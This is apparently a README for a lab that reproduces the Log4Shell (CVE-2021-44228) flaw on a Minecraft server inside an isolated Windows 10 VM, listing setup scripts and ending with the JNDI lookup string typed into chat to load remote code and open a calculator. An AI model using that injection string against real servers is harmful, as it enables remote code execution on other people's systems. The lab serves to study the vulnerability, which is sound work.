This repository contains a lab environment to reproduce and analyze the Log4Shell (CVE-2021-44228) vulnerability on a Minecraft server running inside a Windows 10 virtual machine.
Ensure you have the following installed on your host system:
- QEMU and KVM for virtualization
- genisoimage to build the installer ISO
- curl to download resources
- Maven and JDK to compile the exploit payloads
- A Windows 10 installation ISO (placed in the root directory as
Windows 10 Build 14393.iso)
Run the script to fetch the vulnerable Minecraft server and OpenJDK ZIP for Windows:
./scripts/download_resources.shRun the script to compile the staging files and build the installer ISO:
./scripts/build_installer_iso.shOr for Windows, run:
powershell -File scripts\build_installer_iso.ps1This builds minecraft_installer.iso, which contains a setup script configured to disable online mode verification and launch the server with vulnerable JNDI codebase lookup properties enabled.
Now, you can start the Windows 10 VM inside QEMU:
./scripts/run_vm.shOr you could simply use VMware or VirtualBox. In VM Settings -> Network Adapter, select Host-only so Windows Update never fires. Then, attach minecraft_installer.iso as the VM's CD/DVD image.
Compile the exploit package using Maven in the exploit folder:
cd exploit
mvn clean package -DskipTestsSetup something like this:
Trigger the exploit by entering the JNDI lookup string into the Minecraft chat:
${jndi:ldap://<host-ip>:<ldap-port>/Exploit} // For me it's ${jndi:ldap://10.0.2.2:1389/Exploit}
Then you will see a calculator pop up!

